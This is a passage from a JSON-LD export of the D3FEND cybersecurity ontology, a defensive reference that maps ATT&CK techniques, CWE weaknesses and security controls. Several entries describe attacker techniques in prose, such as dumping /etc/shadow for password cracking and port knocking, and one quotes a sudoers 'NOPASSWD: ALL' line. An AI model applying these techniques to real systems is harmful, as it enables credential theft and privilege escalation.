        }
      ]
    },
    {
      "@id": "_:Nbb3e91eb9cbc41ddbe07d976e4ce85b8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControllerOperatingMode"
      }
    },
    {
      "@id": "_:N4802049755604e48a27d21c0ff1d7589",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTTestCommand"
      }
    },
    {
      "@id": "d3f:CCI-000068_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements cryptographic mechanisms to protect the confidentiality of remote access sessions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:EncryptedTunnels"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-14T00:00:00"
      },
      "rdfs:label": "CCI-000068"
    },
    {
      "@id": "d3f:T1003.008",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": [
        {
          "@id": "d3f:EncryptedCredential"
        },
        {
          "@id": "d3f:PasswordFile"
        }
      ],
      "d3f:attack-id": "T1003.008",
      "d3f:definition": "Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and <code>/etc/shadow</code> to enable offline password cracking. Most modern Linux operating systems use a combination of <code>/etc/passwd</code> and <code>/etc/shadow</code> to store user account information including password hashes in <code>/etc/shadow</code>. By default, <code>/etc/shadow</code> is only readable by the root user.(Citation: Linux Password and Shadow File Formats)",
      "rdfs:label": "/etc/passwd and /etc/shadow",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1003"
        },
        {
          "@id": "_:Nf51c522b10474a7d94a53c9167a37930"
        },
        {
          "@id": "_:N198ed6529e184bd998d07337229ca361"
        }
      ]
    },
    {
      "@id": "_:Nf51c522b10474a7d94a53c9167a37930",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EncryptedCredential"
      }
    },
    {
      "@id": "_:N198ed6529e184bd998d07337229ca361",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PasswordFile"
      }
    },
    {
      "@id": "d3f:AML.T0016.000",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0016.000",
      "d3f:definition": "Adversaries may search for existing open source implementations of AI attacks. The research community often publishes their code for reproducibility and to further future research. Libraries intended for research purposes, such as CleverHans, the Adversarial Robustness Toolbox, and FoolBox, can be weaponized by an adversary. Adversaries may also obtain and use tools that were not originally designed for adversarial AI attacks as part of their attack.",
      "rdfs:label": "Adversarial AI Attack Implementations - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0016.000"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0016"
      },
      "skos:prefLabel": "Adversarial AI Attack Implementations"
    },
    {
      "@id": "d3f:OTReadTimeCommand",
      "@type": "owl:Class",
      "d3f:definition": "Read timing mechanisms.",
      "rdfs:comment": "example",
      "rdfs:label": "OT Read Time Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTTimeCommand"
      }
    },
    {
      "@id": "d3f:ApplicationShim",
      "@type": "owl:Class",
      "d3f:definition": "An application shim adapts an application program to run on a version of a platform for which they were not originally created. Most commonly \"Application Shimming\" refers to use of The Windows Application Compatibility Toolkit (ACT) provides backward compatibility by simulating the behavior of older version of Windows.",
      "rdfs:label": "Application Shim",
      "rdfs:seeAlso": [
        {
          "@id": "d3f:Shim"
        },
        {
          "@id": "http://dbpedia.org/resource/Shim_(computing)#Examples"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:Shim"
      }
    },
    {
      "@id": "d3f:ATLASExfiltrationTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:AML.TA0010"
      },
      "rdfs:label": "Exfiltration Technique - ATLAS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTechnique"
        },
        {
          "@id": "_:Ne28d349f19ba4cd28d1c9f4a9057d944"
        }
      ],
      "skos:prefLabel": "Exfiltration Technique"
    },
    {
      "@id": "_:Ne28d349f19ba4cd28d1c9f4a9057d944",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AML.TA0010"
      }
    },
    {
      "@id": "d3f:Reference-GuardsForApplicationInSoftwareTamperproofing_PurdueResearchFoundation",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US7287166B1/en?oq=US-7287166-B1"
      },
      "d3f:kb-abstract": "A method of protecting a software program from unauthorized modification, and a system for practicing the method. The method utilizes self-protecting software code. Armed internally with self-defensive mechanisms, a self-protecting software program is tamper-resistant. Whenever its integrity is compromised, a self-protecting software program may become unusable due to software program crashes or other errors, or may generate subtle errors that do not immediately result render the program unusable but still result in incorrect software program execution. A self-protecting software program also may be able to repair itself to restore the integrity of its damaged code. The system comprises a computer program for automatically adding self-protection features to a software program.",
      "d3f:kb-author": "Hoi Chang; Mikhail J. Atallah; John R. Rice",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Purdue Research Foundation",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessCodeSegmentVerification"
      },
      "d3f:kb-reference-title": "Guards for application in software tamperproofing",
      "rdfs:label": "Reference - Guards for application in software tamperproofing - Purdue Research Foundation"
    },
    {
      "@id": "d3f:T1553",
      "@type": "owl:Class",
      "d3f:attack-id": "T1553",
      "d3f:definition": "Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted programs. Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust. Examples of such features would include a program being allowed to run because it is signed by a valid code signing certificate, a program prompting the user with a warning because it has an attribute set from being downloaded from the Internet, or getting an indication that you are about to connect to an untrusted site.",
      "rdfs:label": "Subvert Trust Controls",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:CCI-001377_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system uniquely authenticates source domains for information transfer.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DomainTrustPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-22T00:00:00"
      },
      "rdfs:label": "CCI-001377"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_11",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:control-name": "Information Flow Enforcement | Configuration of Security or Privacy Policy Filters",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AC-4(11)"
    },
    {
      "@id": "d3f:VirtualizationSoftware",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Virtualization software allows a single host computer to create and run one or more virtual environments. Virtualization software is most often used to emulate a complete computer system in order to allow a guest operating system to be run, for example allowing Linux to run as a guest on top of a PC that is natively running a Microsoft Windows operating system (or the inverse, running Windows as a guest on Linux).",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Category:Virtualization_software"
      },
      "rdfs:label": "Virtualization Software",
      "rdfs:subClassOf": {
        "@id": "d3f:ServiceApplication"
      }
    },
    {
      "@id": "d3f:CWE-478",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-478",
      "d3f:definition": "The code does not have a default case in an expression with multiple conditions, such as a switch statement.",
      "rdfs:label": "Missing Default Case in Multiple Condition Expression",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1023"
      }
    },
    {
      "@id": "d3f:caused-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x caused-by y: The event or action x occurs as a consequence of event or action y.",
      "owl:inverseOf": {
        "@id": "d3f:causes"
      },
      "rdfs:isDefinedBy": {
        "@id": "https://www.commoncoreontologies.org/ont00001819"
      },
      "rdfs:label": "caused-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:CWE-1385",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1385",
      "d3f:definition": "The product uses a WebSocket, but it does not properly verify that the source of data or communication is valid.",
      "d3f:synonym": "Cross-Site WebSocket hijacking (CSWSH)",
      "rdfs:label": "Missing Origin Validation in WebSockets",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-346"
      }
    },
    {
      "@id": "d3f:CWE-1084",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1084",
      "d3f:definition": "A function or method contains too many operations that utilize a data manager or file resource.",
      "rdfs:label": "Invokable Control Element with Excessive File or Data Access Operations",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-405"
      }
    },
    {
      "@id": "d3f:MemoryBoundaryTracking",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:MemoryBoundaryTracking"
      ],
      "d3f:analyzes": {
        "@id": "d3f:ProcessCodeSegment"
      },
      "d3f:d3fend-id": "D3-MBT",
      "d3f:definition": "Analyzing a call stack for return addresses which point to unexpected  memory locations.",
      "d3f:kb-article": "## How it works\nThis technique monitors for indicators of whether a return address is outside memory previously allocated for an object (i.e. function, module, process, or thread). If so, code that the return address points to is treated as malicious code.\n\n## Considerations\nKernel malware can manipulate memory contents, for example modifying pointers to hide processes, and thereby impact the accuracy of memory allocation information used to perform the analysis.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-InferentialExploitAttemptDetection_CrowdstrikeInc"
      },
      "rdfs:label": "Memory Boundary Tracking",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OperatingSystemMonitoring"
        },
        {
          "@id": "_:N5f8a9f5a745b43c893f58bece71d46a2"
        }
      ]
    },
    {
      "@id": "_:N5f8a9f5a745b43c893f58bece71d46a2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessCodeSegment"
      }
    },
    {
      "@id": "d3f:TA0108",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Initial Access - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Initial Access"
    },
    {
      "@id": "d3f:CCI-002536_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:RFShielding"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system protects organization-defined external and internal wireless links from organization-defined types of signal parameter attacks or references to sources for such attacks.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002536"
    },
    {
      "@id": "d3f:DefenseEvasionTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The adversary is trying to avoid being detected.",
      "d3f:enables": {
        "@id": "d3f:TA0005"
      },
      "rdfs:label": "Defense Evasion Technique",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTechnique"
        },
        {
          "@id": "d3f:OffensiveTechnique"
        },
        {
          "@id": "_:N1db04c4eb6b54988b50573a73263860a"
        }
      ]
    },
    {
      "@id": "_:N1db04c4eb6b54988b50573a73263860a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0005"
      }
    },
    {
      "@id": "d3f:CWE-791",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-791",
      "d3f:definition": "The product receives data from an upstream component, but does not completely filter special elements before sending it to a downstream component.",
      "rdfs:label": "Incomplete Filtering of Special Elements",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-790"
      }
    },
    {
      "@id": "d3f:capec-id",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "Unique identifier for a CAPEC technique, i.e. a common attack pattern identified by the pattern CAPEC-[number].",
      "rdfs:label": "capec-id",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-kb-data-property"
      }
    },
    {
      "@id": "d3f:DS0040",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "Operational databases contain information about the status of the operational process and associated devices, including any measurements, events, history, or alarms that have occurred",
      "rdfs:comment": "This data source currently has no mappings to digital artifacts.",
      "rdfs:label": "Operational Database (ATT&CK DS)"
    },
    {
      "@id": "d3f:DirectionalNetworkLink",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DirectionalNetworkLink"
      ],
      "d3f:d3fend-id": "D3-DNL",
      "d3f:definition": "Enforce one-way network communication by preventing two-way communication.",
      "d3f:kb-article": "## How it works\nUsing a device such as a data diode, or otherwise enforcing unidirectional (one-way) network communication / data transfer, to physically prevent signals from traveling in the reverse direction.\n\nUnidirectional network link enforcement is a security measure used to separate control and safety systems in operational technology (OT) environments. By employing physical data diodes, this approach ensures one-way communication, allowing information from safety systems to be viewed without permitting any modification or interference, thereby protecting the integrity of the safety system.\n\n",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SecureOneWayDataTransferUsingCommunicationInterfaceCircuitry"
      },
      "d3f:restricts": {
        "@id": "d3f:PhysicalLink"
      },
      "d3f:uses": {
        "@id": "d3f:PhysicalDataDiode"
      },
      "rdfs:label": "Directional Network Link",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkIsolation"
        },
        {
          "@id": "_:N74dc1f99b36d459192f7272fae08d32f"
        },
        {
          "@id": "_:N7d89bcb610774258bad6a11b9e161b91"
        }
      ]
    },
    {
      "@id": "_:N74dc1f99b36d459192f7272fae08d32f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restricts"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalLink"
      }
    },
    {
      "@id": "_:N7d89bcb610774258bad6a11b9e161b91",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:uses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalDataDiode"
      }
    },
    {
      "@id": "d3f:T0877",
      "@type": "owl:Class",
      "d3f:attack-id": "T0877",
      "d3f:definition": "Adversaries may seek to capture process values related to the inputs and outputs of a PLC. During the scan cycle, a PLC reads the status of all inputs and stores them in an image table. (Citation: Nanjundaiah, Vaidyanath) The image table is the PLCs internal storage location where values of inputs/outputs for one scan are stored while it executes the user program. After the PLC has solved the entire logic program, it updates the output image table. The contents of this output image table are written to the corresponding output points in I/O Modules.",
      "rdfs:label": "I/O Image - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSCollectionTechnique"
      },
      "skos:prefLabel": "I/O Image"
    },
    {
      "@id": "d3f:CWE-1339",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1339",
      "d3f:definition": "The product processes a real number with an implementation in which the number's representation does not preserve required accuracy and precision in its fractional part, causing an incorrect result.",
      "rdfs:label": "Insufficient Precision or Accuracy of a Real Number",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-682"
      }
    },
    {
      "@id": "d3f:OperatingSystem",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": [
        {
          "@id": "d3f:Kernel"
        },
        {
          "@id": "d3f:LocalUserAccount"
        },
        {
          "@id": "d3f:OperatingSystemClock"
        },
        {
          "@id": "d3f:SystemServiceSoftware"
        }
      ],
      "d3f:definition": "An operating system (OS) is system software that manages computer hardware and software resources and provides common services for computer programs. All computer programs, excluding firmware, require an operating system to function. Time-sharing operating systems schedule tasks for efficient use of the system and may also include accounting software for cost allocation of processor time, mass storage, printing, and other resources.",
      "d3f:may-contain": {
        "@id": "d3f:OperatingSystemConfigurationComponent"
      },
      "rdfs:label": "Operating System",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Operating_system"
        },
        {
          "@id": "https://schema.ocsf.io/objects/os"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:N7f014ab9097e4d86b537e28ea75ab21e"
        },
        {
          "@id": "_:N4dc05552eef04a9a9c5438dc349dd8f2"
        },
        {
          "@id": "_:Nc9685930aa1544efac2185f104fdff5d"
        },
        {
          "@id": "_:Nc1f94b48288f4ecb949a72982516219e"
        },
        {
          "@id": "_:N957287b50c2b44a585544a1496d4cfb1"
        }
      ]
    },
    {
      "@id": "_:N7f014ab9097e4d86b537e28ea75ab21e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Kernel"
      }
    },
    {
      "@id": "_:N4dc05552eef04a9a9c5438dc349dd8f2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LocalUserAccount"
      }
    },
    {
      "@id": "_:Nc9685930aa1544efac2185f104fdff5d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemClock"
      }
    },
    {
      "@id": "_:Nc1f94b48288f4ecb949a72982516219e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemServiceSoftware"
      }
    },
    {
      "@id": "_:N957287b50c2b44a585544a1496d4cfb1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemConfigurationComponent"
      }
    },
    {
      "@id": "d3f:CWE-319",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-319",
      "d3f:definition": "The product transmits sensitive or security-critical data in cleartext in a communication channel that can be sniffed by unauthorized actors.",
      "rdfs:label": "Cleartext Transmission of Sensitive Information",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-311"
      }
    },
    {
      "@id": "d3f:T1669",
      "@type": "owl:Class",
      "d3f:attack-id": "T1669",
      "d3f:definition": "Adversaries may gain initial access to target systems by connecting to wireless networks. They may accomplish this by exploiting open Wi-Fi networks used by target devices or by accessing secured Wi-Fi networks — requiring [Valid Accounts](https://attack.mitre.org/techniques/T1078) — belonging to a target organization.(Citation: DOJ GRU Charges 2018)(Citation: Nearest Neighbor Volexity) Establishing a connection to a Wi-Fi access point requires a certain level of proximity to both discover and maintain a stable network connection.",
      "rdfs:label": "Wi-Fi Networks",
      "rdfs:subClassOf": {
        "@id": "d3f:InitialAccessTechnique"
      }
    },
    {
      "@id": "d3f:powers",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x powers y: x furnishes y with the energy or force required for y's functionality or operation.",
      "rdfs:label": "powers",
      "rdfs:subPropertyOf": {
        "@id": "d3f:has-dependent"
      }
    },
    {
      "@id": "d3f:CCI-001094_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system restricts the ability of individuals to launch organization-defined denial of service attacks against other information systems.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001094"
    },
    {
      "@id": "d3f:CWE-284",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-284",
      "d3f:definition": "The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor.",
      "d3f:synonym": "Authorization",
      "rdfs:label": "Improper Access Control",
      "rdfs:subClassOf": {
        "@id": "d3f:Weakness"
      }
    },
    {
      "@id": "d3f:ConnectSocket",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:connects": {
        "@id": "d3f:Pipe"
      },
      "d3f:definition": "The connect socket system call connects the socket to a target address.",
      "rdfs:label": "Connect Socket",
      "rdfs:seeAlso": {
        "@id": "https://man7.org/linux/man-pages/man2/connect.2.html"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:Nf6ebc4df3f7a4d1591587734a0ad0828"
        }
      ]
    },
    {
      "@id": "_:Nf6ebc4df3f7a4d1591587734a0ad0828",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:connects"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Pipe"
      }
    },
    {
      "@id": "d3f:T1506",
      "@type": "owl:Class",
      "d3f:attack-id": "T1506",
      "d3f:definition": "Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1550.004",
      "rdfs:label": "Web Session Cookie",
      "rdfs:seeAlso": {
        "@id": "d3f:T1550.004"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:LateralMovementTechnique"
        }
      ]
    },
    {
      "@id": "d3f:T1593.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1593.002",
      "d3f:definition": "Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)",
      "rdfs:label": "Search Engines",
      "rdfs:subClassOf": {
        "@id": "d3f:T1593"
      }
    },
    {
      "@id": "d3f:T1205.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1205.001",
      "d3f:definition": "Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.",
      "d3f:produces": {
        "@id": "d3f:NetworkTraffic"
      },
      "rdfs:label": "Port Knocking",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1205"
        },
        {
          "@id": "_:N8e9aebec0c7d4c18af8649d3c3ed7002"
        }
      ]
    },
    {
      "@id": "_:N8e9aebec0c7d4c18af8649d3c3ed7002",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:CWE-383",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-383",
      "d3f:definition": "Thread management in a Web application is forbidden in some circumstances and is always highly error prone.",
      "rdfs:label": "J2EE Bad Practices: Direct Use of Threads",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-695"
      }
    },
    {
      "@id": "d3f:T1496.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1496.004",
      "d3f:definition": "Adversaries may leverage compromised software-as-a-service (SaaS) applications to complete resource-intensive tasks, which may impact hosted service availability.",
      "rdfs:label": "Cloud Service Hijacking",
      "rdfs:subClassOf": {
        "@id": "d3f:T1496"
      }
    },
    {
      "@id": "d3f:CWE-1273",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1273",
      "d3f:definition": "The credentials necessary for unlocking a device are shared across multiple parties and may expose sensitive information.",
      "rdfs:label": "Device Unlock Credential Sharing",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-200"
      }
    },
    {
      "@id": "d3f:T1169",
      "@type": "owl:Class",
      "d3f:attack-id": "T1169",
      "d3f:definition": "The sudoers file, <code>/etc/sudoers</code>, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the idea of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like <code>user1 ALL=(ALL) NOPASSWD: ALL</code> (Citation: OSX.Dok Malware).",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1548.003",
      "rdfs:label": "Sudo",
      "rdfs:seeAlso": {
        "@id": "d3f:T1548.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PrivilegeEscalationTechnique"
      }
    },
    {
      "@id": "d3f:ATTACKEnterpriseMitigation",
      "@type": "owl:Class",
      "rdfs:label": "ATTACK Enterprise Mitigation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseThing"
        },
        {
          "@id": "_:Nc4901b9677ff47268e56ce9ddca8156d"
        },
        {
          "@id": "_:N0fdd0ef9f62a418798bcfc51890c36c0"
        }
      ]
    },
    {
      "@id": "_:Nc4901b9677ff47268e56ce9ddca8156d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:semantic-relation"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DefensiveTechnique"
      }
    },
    {
      "@id": "_:N0fdd0ef9f62a418798bcfc51890c36c0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:d3fend-comment"
      },
      "owl:someValuesFrom": {
        "@id": "xsd:string"
      }
    },
    {
      "@id": "d3f:CWE-269",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-269",
      "d3f:definition": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor.",
      "rdfs:label": "Improper Privilege Management",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:T1119",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:File"
      },
      "d3f:attack-id": "T1119",
      "d3f:definition": "Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals.",
      "rdfs:label": "Automated Collection",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CollectionTechnique"
        },
        {
          "@id": "_:N2194451287b3468ea1392870504c175e"
        }
      ]
    },
    {
      "@id": "_:N2194451287b3468ea1392870504c175e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:CWE-1263",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1263",
      "d3f:definition": "The product is designed with access restricted to certain information, but it does not sufficiently protect against an unauthorized actor with physical access to these areas.",
      "rdfs:label": "Improper Physical Access Control",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:T1494",
      "@type": "owl:Class",
      "d3f:attack-id": "T1494",
      "d3f:definition": "Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1565.003",
      "rdfs:label": "Runtime Data Manipulation",
      "rdfs:seeAlso": {
        "@id": "d3f:T1565.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ImpactTechnique"
      }
    },
    {
      "@id": "d3f:may-modify",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x may-modify y: The entity x may modify the thing y; that is, 'x modifies y' may be true.",
      "rdfs:label": "may-modify",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:CCI-002145_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces organization-defined circumstances and/or usage conditions for organization-defined information system accounts.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002145"
    },
    {
      "@id": "d3f:T1133",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1133",
